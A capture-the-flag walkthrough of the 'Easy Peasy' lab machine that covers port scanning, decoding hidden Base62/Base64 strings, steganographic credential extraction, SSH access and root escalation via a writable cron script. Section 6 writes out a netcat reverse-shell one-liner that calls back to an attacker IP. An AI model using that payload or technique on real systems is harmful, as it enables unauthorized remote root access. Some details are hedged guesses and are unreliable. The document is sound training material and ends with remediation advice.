Target IP: easypeasy.thm (Requires /etc/hosts entry)
Difficulty: Easy
Objective: User (user.txt) & Root (root.txt) Flags
1. Executive Summary
“Easy Peasy” is a Linux machine hosting multiple web servers (Nginx and Apache) on non-standard ports. The attack path involves extensive enumeration to find hidden directories and encoded strings (Base64, Base62). Credentials for SSH are recovered by performing Steganography on an image found in a hidden directory. Privilege escalation is achieved by exploiting a Cron Job that executes a writable bash script as root.
Key TTPs (MITRE ATT&CK):
- T1595 (Active Scanning): Discovering high ports (65524).
- T1027 (Obfuscated Files or Information): Decoding Base62 and ROT13.
- T1027.003 (Steganography): Extracting data from images (
steghide). - T1053 (Scheduled Task/Job): Modifying a writable cron script for privilege escalation.
2. Operational Setup
Host Configuration
echo "10.10.x.x easypeasy.thm" | sudo tee -a /etc/hosts3. Enumeration: “The Multi-Port Hunt”
A. Network Scanning
Your Nmap scan revealed the critical, non-standard port 65524.
nmap -sC -sV -p- -oA nmap/easypeasy easypeasy.thm- 80/tcp: Nginx.
- 6498/tcp: SSH (Non-standard port).
- 65524/tcp: Apache.
B. Web Enumeration (Port 80 - Nginx)
- Robots.txt: Reveals
/hidden. - Flag 1: Viewing the source of
/hiddenreveals a Base64 string.
echo "ZmxhZ3..." | base64 -d
# Result: Flag 1C. Web Enumeration (Port 65524 - Apache)
This is where the real breadcrumbs are.
- Flag 2 (The Hash):
Checking
http://easypeasy.thm:65524/robots.txtreveals a hash:a18672860d0510e5ab6699730763b250.
- Action: Crack it (MD5).
- Result:
flag{1m_s3c0nd_fl4g}.
- The Hidden Path (Base62):
Viewing the source code of the main page reveals a hidden
<p>tag:its encoded with ba..:ObsJmP173N2X6dOrAgEAL0Vu
- Decoding: This is Base62. (CyberChef is perfect for this).
- Result:
/n0th1ng3ls3m4tt3r.
4. Steganography: The Image
We navigate to http://easypeasy.thm:65524/n0th1ng3ls3m4tt3r.
- Content: An image
binarycodepixabay.jpg. - Flag 3: Found in the source code (
flag{9fdaf...}). - The Password: The page source also contains a hash or binary string that translates to the password for the image. (Likely
mypasswordforthatstegoor similar).
Extraction
We use Steghide to extract hidden data from the JPG.
steghide extract -sf binarycodepixabay.jpg
# Password: (Recovered from hash)Result: secrettext.txt containing:
- User:
boring - Password:
iconvertedmypasswordtobinary(You may need to convert binary to text).
5. Initial Access: SSH
We log in using the non-standard port found in Nmap.
ssh boring@easypeasy.thm -p 6498User Flag:
The user.txt file is present but encoded.
- Technique: ROT13.
- Decode:
tr 'A-Za-z' 'N-ZA-Mn-za-m' < user.txt.
6. Privilege Escalation: Cron Job
Enumeration
We check for scheduled tasks.
cat /etc/crontabOutput:
* * * * * root /var/www/.mysecretcronjob.shThe Vulnerability
We check permissions on the script.
ls -la /var/www/.mysecretcronjob.sh
# -rwxr-xr-x 1 boring boring ... .mysecretcronjob.shCritical Flaw: The script runs as root, but it is owned and writable by the user boring. We can overwrite it.
Exploitation
We replace the script contents with a reverse shell.
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.YOUR.IP 4444 >/tmp/f" > /var/www/.mysecretcronjob.shExecution:
- Start listener:
nc -lvnp 4444. - Wait 60 seconds.
- Root Shell.
Root Flag: /root/root.txt.
7. Remediation (Blue Team)
- Steganography: While hard to detect, avoid hosting images containing sensitive credentials on public web servers.
- Information Disclosure:
- Remove hidden comments and hashes (
robots.txt, HTML comments) from production code. - Do not use weak encoding (Base64/Base62) to “hide” directory paths.
- Cron Job Permissions:
- Scripts executed by root must be owned by root and writable only by root (
chmod 700or744). - Use absolute paths in cron scripts to prevent PATH hijacking (though not the issue here, it’s best practice).